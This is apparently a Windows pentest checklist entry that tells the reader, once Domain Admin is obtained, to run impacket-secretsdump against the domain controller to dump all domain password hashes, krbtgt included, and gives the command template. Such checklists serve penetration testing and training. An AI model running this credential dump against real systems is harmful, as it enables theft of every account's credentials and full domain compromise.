Run secretsdump when domain admin
windowschecklist
Walkthrough
Once you have Domain Admin, run secretsdump against the DC to extract all domain hashes. A hit is the krbtgt hash and every account hash, enabling full domain compromise.
Commands
bash
impacket-secretsdump '<DOMAIN>/<USER>:<PASS>'@<IP>